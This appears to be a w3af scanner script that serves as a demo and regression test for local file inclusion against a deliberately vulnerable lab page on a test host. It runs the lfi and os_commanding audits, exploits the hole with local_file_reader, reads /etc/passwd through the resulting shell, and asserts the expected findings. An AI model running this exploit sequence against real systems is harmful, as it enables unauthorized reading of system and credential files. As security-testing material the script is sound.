# This is the local file inclusion demo:

plugins
audit os_commanding, lfi
crawl web_spider
crawl config web_spider
set only_forward True
back
grep path_disclosure

output console,text_file
output config text_file
set output_file output-w3af.txt
set verbose True
back
back

target
set target http://moth/w3af/audit/local_file_inclusion/trivial_lfi.php?file=index.html
back

start

exploit
exploit local_file_reader

interact 0

read /etc/passwd
payload tcp

list

exit
back

assert len(kb.kb.get('lfi','lfi')) == 3
assert len(kb.kb.get('local_file_reader','shell')) == 1
assert len(kb.kb.get('path_disclosure','listFiles')) > 2

exit
